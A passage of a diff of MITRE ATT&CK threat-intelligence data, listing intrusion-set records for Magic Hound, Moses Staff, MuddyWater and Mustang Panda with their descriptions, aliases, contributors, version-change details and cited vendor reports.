+                            "url": "https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Manikantan Srinivasan, NEC Corporation India",
+                        "Pooja Natarajan, NEC Corporation India",
+                        "Hiroki Nagahama, NEC Corporation"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2024-11-17 14:12:07.294000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-01-16 16:13:52.465000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Magic Hound",
+                    "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021)",
+                    "aliases": [
+                        "Magic Hound",
+                        "TA453",
+                        "COBALT ILLUSION",
+                        "Charming Kitten",
+                        "ITG18",
+                        "Phosphorus",
+                        "Newscaster",
+                        "APT35",
+                        "Mint Sandstorm"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0059",
+                            "external_id": "G0059"
+                        },
+                        {
+                            "source_name": "Charming Kitten",
+                            "description": "(Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)"
+                        },
+                        {
+                            "source_name": "APT35",
+                            "description": "(Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021)(Citation: Check Point APT35 CharmPower January 2022)"
+                        },
+                        {
+                            "source_name": "ITG18",
+                            "description": "(Citation: IBM ITG18 2020)"
+                        },
+                        {
+                            "source_name": "Phosphorus",
+                            "description": "(Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)"
+                        },
+                        {
+                            "source_name": "Mint Sandstorm",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "TA453",
+                            "description": "(Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Check Point APT35 CharmPower January 2022)"
+                        },
+                        {
+                            "source_name": "COBALT ILLUSION",
+                            "description": "(Citation: Secureworks COBALT ILLUSION Threat Profile)"
+                        },
+                        {
+                            "source_name": "Magic Hound",
+                            "description": "(Citation: Unit 42 Magic Hound Feb 2017)"
+                        },
+                        {
+                            "source_name": "Microsoft Phosphorus Mar 2019",
+                            "description": "Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.",
+                            "url": "https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/"
+                        },
+                        {
+                            "source_name": "Microsoft Phosphorus Oct 2020",
+                            "description": "Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.",
+                            "url": "https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/"
+                        },
+                        {
+                            "source_name": "Certfa Charming Kitten January 2021",
+                            "description": "Certfa Labs. (2021, January 8). Charming Kitten\u2019s Christmas Gift. Retrieved May 3, 2021.",
+                            "url": "https://blog.certfa.com/posts/charming-kitten-christmas-gift/"
+                        },
+                        {
+                            "source_name": "Check Point APT35 CharmPower January 2022",
+                            "description": "Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.",
+                            "url": "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/"
+                        },
+                        {
+                            "source_name": "ClearSky Charming Kitten Dec 2017",
+                            "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
+                            "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
+                        },
+                        {
+                            "source_name": "ClearSky Kittens Back 2 Oct 2019",
+                            "description": "ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.",
+                            "url": "https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf"
+                        },
+                        {
+                            "source_name": "ClearSky Kittens Back 3 August 2020",
+                            "description": "ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.",
+                            "url": "https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf"
+                        },
+                        {
+                            "source_name": "Eweek Newscaster and Charming Kitten May 2014",
+                            "description": "Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.",
+                            "url": "https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering"
+                        },
+                        {
+                            "source_name": "Unit 42 Magic Hound Feb 2017",
+                            "description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
+                        },
+                        {
+                            "source_name": "Newscaster",
+                            "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)"
+                        },
+                        {
+                            "source_name": "FireEye APT35 2018",
+                            "description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved November 17, 2024.",
+                            "url": "https://static.carahsoft.com/concrete/files/1015/2779/3571/M-Trends-2018-Report.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Proofpoint TA453 July2021",
+                            "description": "Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453"
+                        },
+                        {
+                            "source_name": "Proofpoint TA453 March 2021",
+                            "description": "Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential"
+                        },
+                        {
+                            "source_name": "Secureworks COBALT ILLUSION Threat Profile",
+                            "description": "Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.",
+                            "url": "https://www.secureworks.com/research/threat-profiles/cobalt-illusion"
+                        },
+                        {
+                            "source_name": "US District Court of DC Phosphorus Complaint 2019",
+                            "description": "US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.",
+                            "url": "https://noticeofpleadings.com/phosphorus/files/Complaint.pdf"
+                        },
+                        {
+                            "source_name": "IBM ITG18 2020",
+                            "description": "Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.",
+                            "url": "https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Anastasios Pingios",
+                        "Bryan Lee",
+                        "Daniyal Naeem, BT Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "6.1",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2024-11-17 16:17:26.385000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "6.1"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-08-11 22:47:27.686000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Moses Staff",
+                    "description": "[Moses Staff](https://attack.mitre.org/groups/G1009) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://attack.mitre.org/groups/G1009) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand.(Citation: Checkpoint MosesStaff Nov 2021) \n\nSecurity researchers assess [Moses Staff](https://attack.mitre.org/groups/G1009) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.(Citation: Cybereason StrifeWater Feb 2022)",
+                    "aliases": [
+                        "Moses Staff",
+                        "DEV-0500",
+                        "Marigold Sandstorm"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G1009",
+                            "external_id": "G1009"
+                        },
+                        {
+                            "source_name": "DEV-0500",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "Marigold Sandstorm",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "Checkpoint MosesStaff Nov 2021",
+                            "description": "Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. Retrieved August 11, 2022.",
+                            "url": "https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/"
+                        },
+                        {
+                            "source_name": "Cybereason StrifeWater Feb 2022",
+                            "description": "Cybereason Nocturnus. (2022, February 1). StrifeWater RAT: Iranian APT Moses Staff Adds New Trojan to Ransomware Operations. Retrieved August 15, 2022.",
+                            "url": "https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Hiroki Nagahama, NEC Corporation",
+                        "Pooja Natarajan, NEC Corporation India",
+                        "Manikantan Srinivasan, NEC Corporation India"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2024-04-11 00:39:25.190000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "MuddyWater",
+                    "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. [MuddyWater](https://attack.mitre.org/groups/G0069) has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, [MuddyWater](https://attack.mitre.org/groups/G0069) used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. (Citation: FalconFeeds_Iran_Mar2026)(Citation: Huntio_IranInfra_Mar2026)(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)(Citation: NaumaanProofpoint_GlobalClickFix_April2025)(Citation: ESET_MuddyWater_Dec2025)(Citation: SymantecCarbonBlack_Seedworm_Mar2026)   ",
+                    "aliases": [
+                        "MuddyWater",
+                        "Earth Vetala",
+                        "MERCURY",
+                        "Static Kitten",
+                        "Seedworm",
+                        "TEMP.Zagros",
+                        "Mango Sandstorm",
+                        "TA450",
+                        "MuddyKrill"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0069",
+                            "external_id": "G0069"
+                        },
+                        {
+                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
+                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
+                            "url": "https://blog.cloudflare.com/2026-threat-report/"
+                        },
+                        {
+                            "source_name": "MERCURY",
+                            "description": "(Citation: Anomali Static Kitten February 2021)"
+                        },
+                        {
+                            "source_name": "Static Kitten",
+                            "description": "(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
+                        },
+                        {
+                            "source_name": "MuddyKrill",
+                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
+                        },
+                        {
+                            "source_name": "TEMP.Zagros",
+                            "description": "(Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
+                        },
+                        {
+                            "source_name": "Mango Sandstorm",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "TA450",
+                            "description": "(Citation: Proofpoint TA450 Phishing March 2024)"
+                        },
+                        {
+                            "source_name": "Seedworm",
+                            "description": "(Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
+                        },
+                        {
+                            "source_name": "Earth Vetala",
+                            "description": "(Citation: Trend Micro Muddy Water March 2021)"
+                        },
+                        {
+                            "source_name": "MuddyWater",
+                            "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)"
+                        },
+                        {
+                            "source_name": "ClearSky MuddyWater Nov 2018",
+                            "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
+                            "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf"
+                        },
+                        {
+                            "source_name": "ClearSky MuddyWater June 2019",
+                            "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020.",
+                            "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf"
+                        },
+                        {
+                            "source_name": "CYBERCOM Iranian Intel Cyber January 2022",
+                            "description": "Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.",
+                            "url": "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/"
+                        },
+                        {
+                            "source_name": "ESET_MuddyWater_Dec2025",
+                            "description": "ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026.",
+                            "url": "https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/"
+                        },
+                        {
+                            "source_name": "FalconFeeds_Iran_Mar2026",
+                            "description": "FalconFeeds.io. (2026, March 5). The Digital Redoubt: Iran\u2019s National Information Network and the Asymmetry of Modern Cyber Conflict. Retrieved March 9, 2026.",
+                            "url": "https://falconfeeds.io/blogs/the-digital-redoubt-irans-national-information-network-cyber-conflict"
+                        },
+                        {
+                            "source_name": "DHS CISA AA22-055A MuddyWater February 2022",
+                            "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.",
+                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a"
+                        },
+                        {
+                            "source_name": "Huntio_IranInfra_Mar2026",
+                            "description": "Hunt.io. (2026, March 4). Iranian APT Infrastructure in Focus:  Mapping State-Aligned Clusters During Geopolitical Escalation. Retrieved April 16, 2026.",
+                            "url": "https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters"
+                        },
+                        {
+                            "source_name": "Unit 42 MuddyWater Nov 2017",
+                            "description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+                        },
+                        {
+                            "source_name": "Talos MuddyWater Jan 2022",
+                            "description": "Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.",
+                            "url": "https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html"
+                        },
+                        {
+                            "source_name": "Anomali Static Kitten February 2021",
+                            "description": "Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.",
+                            "url": "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Proofpoint TA450 Phishing March 2024",
+                            "description": "Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign"
+                        },
+                        {
+                            "source_name": "NaumaanProofpoint_GlobalClickFix_April2025",
+                            "description": "Naumaan, S., et al. (2025, April 17). Around the World in 90 Days: State-Sponsored Actors Try ClickFix . Retrieved January 21, 2026.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix"
+                        },
+                        {
+                            "source_name": "Trend Micro Muddy Water March 2021",
+                            "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.",
+                            "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html"
+                        },
+                        {
+                            "source_name": "Reaqta MuddyWater November 2017",
+                            "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.",
+                            "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/"
+                        },
+                        {
+                            "source_name": "FireEye MuddyWater Mar 2018",
+                            "description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+                        },
+                        {
+                            "source_name": "Symantec MuddyWater Dec 2018",
+                            "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
+                            "url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
+                        },
+                        {
+                            "source_name": "SymantecCarbonBlack_Seedworm_Mar2026",
+                            "description": "Threat Hunter Team. (2026, March 5). Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company. Retrieved March 5, 2026.",
+                            "url": "https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Daniyal Naeem, BT Security",
+                        "Marco Pedrinazzi, @pedrinazziM",
+                        "Ozer Sarilar, @ozersarilar, STM",
+                        "Dragos Threat Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "7.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 03:26:57.416000+00:00\"}}}",
+                    "previous_version": "7.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-04-12 15:56:28.861000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Mustang Panda",
+                    "description": "[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. [Mustang Panda](https://attack.mitre.org/groups/G0129) has been known to use tailored phishing lures and decoy documents to deliver malicious payloads.  [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam. (Citation: BlackBerry MUSTANG PANDA October 2022)(Citation: Eset PlugX Korplug Mustang Panda March 2022)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: DOJ Affidavit Search and Seizure PlugX December 2024)(Citation: EclecticIQ Mustang Panda PlugX)(Citation: ATTACKIQ MUSTANG PANDA TONESHELL March 2023)(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Palo Alto Networks, Unit 42)(Citation: Sophos PlugX September 2022)(Citation: Sophos Mustang Panda PLUGX)(Citation: Zscaler)",
+                    "aliases": [
+                        "Mustang Panda",
+                        "TA416",
+                        "RedDelta",
+                        "BRONZE PRESIDENT",
+                        "STATELY TAURUS",
+                        "FIREANT",
+                        "CAMARO DRAGON",
+                        "EARTH PRETA",
+                        "HIVE0154",
+                        "TWILL TYPHOON",
+                        "TANTALUM",
+                        "LUMINOUS MOTH",
+                        "UNC6384",
+                        "TEMP.Hex",
+                        "Red Lich",
+                        "ClumsyToad"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0129",
+                            "external_id": "G0129"
+                        },
+                        {
+                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
+                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
+                            "url": "https://blog.cloudflare.com/2026-threat-report/"
+                        },
+                        {
+                            "source_name": "EARTH PRETA",
+                            "description": "(Citation: 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload)(Citation: Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024)(Citation: Trend Micro Mustang Panda Earth Preta Toneshell February 2025)(Citation: Trend Micro Mustang Panda Earth Preta TONESHELL June 2023)"
+                        },
+                        {
+                            "source_name": "FIREANT",
+                            "description": "(Citation: Broadcom)"
+                        },
+                        {
+                            "source_name": "ClumsyToad",
+                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
+                        },
+                        {
+                            "source_name": "Mustang Panda",
+                            "description": "(Citation: Crowdstrike MUSTANG PANDA June 2018)"
+                        },
+                        {
+                            "source_name": "UNC6384",
+                            "description": "(Citation: Google Threat Intelligence Group MUSTANG PANDA PLUGX August 2025)"
+                        },
+                        {
+                            "source_name": "TEMP.Hex",
+                            "description": "(Citation: Google Threat Intelligence Group MUSTANG PANDA PLUGX August 2025)"
+                        },
+                        {
+                            "source_name": "CAMARO DRAGON",
+                            "description": "(Citation: HorseShell)"
+                        },
+                        {
+                            "source_name": "HIVE0154",
+                            "description": "(Citation: IBM MUSTANG PANDA PUBLOAD CLAIMLOADER JUNE 2025)(Citation: 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA)"
+                        },
+                        {
+                            "source_name": "TWILL TYPHOON",
+                            "description": "(Citation: Microsoft Naming Conventions Frequently Updated)"
+                        },
+                        {
+                            "source_name": "TANTALUM",
+                            "description": "(Citation: Microsoft Naming Conventions Frequently Updated)"
+                        },
+                        {
+                            "source_name": "LUMINOUS MOTH",
+                            "description": "(Citation: Microsoft Naming Conventions Frequently Updated)"
+                        },
+                        {
+                            "source_name": "STATELY TAURUS",
+                            "description": "(Citation: Palo Alto Networks, Unit 42)(Citation: Unit42 Bookworm Nov2015)(Citation: Unit42 Chinese VSCode 06 September 2024)(Citation: Broadcom)(Citation: Palo Alto Unit42 STATELY TAURUS TONESHELL September 2023)(Citation: CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024)"
+                        },
+                        {
+                            "source_name": "TA416",
+                            "description": "(Citation: Proofpoint TA416 November 2020)"
+                        },
+                        {
+                            "source_name": "Red Lich",
+                            "description": "(Citation: PWC UK MUSTANG PANDA RED LICH February 2021)"
+                        },
+                        {
+                            "source_name": "RedDelta",
+                            "description": "(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 Europe March 2022)"
+                        },
+                        {
+                            "source_name": "BRONZE PRESIDENT",
+                            "description": "(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Sophos PlugX September 2022)(Citation: Sophos Mustang Panda PLUGX)"
+                        },
+                        {
+                            "source_name": "Eset PlugX Korplug Mustang Panda March 2022",
+                            "description": "Alexandre Cote Cyr. (2022, March 23). Mustang Panda\u2019s Hodur: Old tricks, new Korplug variant. Retrieved September 9, 2025.",
+                            "url": "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/"
